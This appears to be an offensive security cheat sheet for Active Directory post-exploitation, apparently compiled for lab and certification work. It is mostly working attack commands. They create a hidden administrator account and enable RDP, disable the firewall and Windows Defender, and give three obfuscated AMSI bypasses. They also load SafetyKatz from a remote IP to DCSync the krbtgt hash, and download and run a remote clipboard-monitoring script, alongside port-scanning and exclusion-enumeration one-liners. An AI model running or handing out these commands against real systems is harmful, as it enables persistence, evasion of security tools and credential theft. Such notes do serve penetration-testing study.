Post Exploitation Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create user asuka and add to RDP, Admin, and WinRM.
Copy net user asuka 'TrYh@rdeR!' / add
net localgroup "Remote Desktop Users" asuka / add
net localgroup "Administrators" asuka / add
net localgroup "Remote Management Users" asuka / add Enable RDP Access
Copy Set-ItemProperty - Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" - value 0
Enable-NetFirewallRule - DisplayGroup "Remote Desktop"
# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group = "remote desktop" new enable = Yes Access RDP
Copy xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb
# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0 Defender and Firewall Stuff
Turn Off Firewall
Copy # powershell
Set-NetFirewallProfile - Profile Domain , Public , Private - Enabled False
# cmd
netsh advfirewall set allprofiles state off Disable Defender Real Time Monitoring
Copy # Remove Defender Database
cmd / c "C:\Program Files\Windows Defender\MpCmdRun.exe" - RemoveDefinitions - All
Get-MpComputerStatus
Set-MpPreference - DisableRealtimeMonitoring $true
Set-MpPreference - DisableIOAVProtection $true
Set-MpPreference - ExclusionExtension "ps1"
Set-MPPreference - DisableBehaviorMonitoring $true
# Disable AMSI (set to 0 to enable)
Set-MpPreference - DisableScriptScanning 1
# Check all exclusion folder
Get-MpPreference | Select-Object - Property ExclusionPath - ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference - ExclusionPath C:\Mimikatz\
# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" / f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" / v "DisableAntiSpyware" / t REG_DWORD / d "1" / f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" / v "DisableAntiVirus" / t REG_DWORD / d "1" / f Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
Copy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat AMSI Bypass
Detection: https://github.com/RythmStick/AMSITrigger
2023 CRTP Base64
Copy $a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
Copy S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copy [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) OPSEC with Loader
Copy C:\AD\Tools\ Loader.exe - path http: // 172.16 . 100.67 / SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
Copy iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
TCP Port Scanner
Copy 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell Ping Sweep
Copy for / l % i in ( 1 , 1 , 254 ) do @ping - n 1 - w 100 172.16 . 8 . % i > nul && echo 172.16 . 8 . % i is up. # cmd Inveigh
Responder, but in Powershell/C#
MDE Enum
How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges
Copy # local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe < i p > < usernam e > < passwor d > < domai n > /paths
# i.e
. \ mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths Or, use this Powershell script.
Copy $logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent - LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
if ( $_.Message -match $pattern) {
$matches [ 0 ]
}
} Reference:
Other Useful Stuff
Last updated 2 months ago
